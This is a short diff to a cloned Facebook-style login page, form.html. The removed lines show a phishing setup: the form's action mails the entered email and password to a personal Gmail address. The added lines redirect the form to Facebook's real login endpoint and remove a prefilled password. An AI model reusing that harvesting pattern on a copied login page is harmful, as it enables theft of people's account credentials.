--- a/form.html
+++ b/form.html
@@ -1,7 +1,7 @@
 <!DOCTYPE>
 
 <html>
-    <form id="login_form" action="MAILTO:bridget.basan@gmail.com" method="post" novalidate="1" onsubmit="return window.Event && Event.__inlineSubmit && Event.__inlineSubmit(this,event)">
+    <form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1&lwv=110" method="post" novalidate="1" onsubmit="return window.Event && Event.__inlineSubmit && Event.__inlineSubmit(this,event)">
         <table cellspacing="0" role="presentation">
             <tbody>
                 <tr>
@@ -17,7 +17,7 @@
                         <input type="email" class="inputtext" name="email" id="email" value="" tabindex="1">
                     </td>
                     <td>
-                        <input type="password" class="inputtext" name="pass" id="pass" tabindex="2" value="123">
+                        <input type="password" class="inputtext" name="pass" id="pass" tabindex="2">
                     </td>
                     <td>
                         <label class="uiButton uiButtonConfirm" id="loginbutton" for="u_0_v">
@@ -27,8 +27,7 @@
                 </tr>
             </tbody>
         </table>
-        <input type="hidden" autocomplete="off" name="timezone" value="360" id="u_0_w">
-
+        
                     
     </form>
 </html>
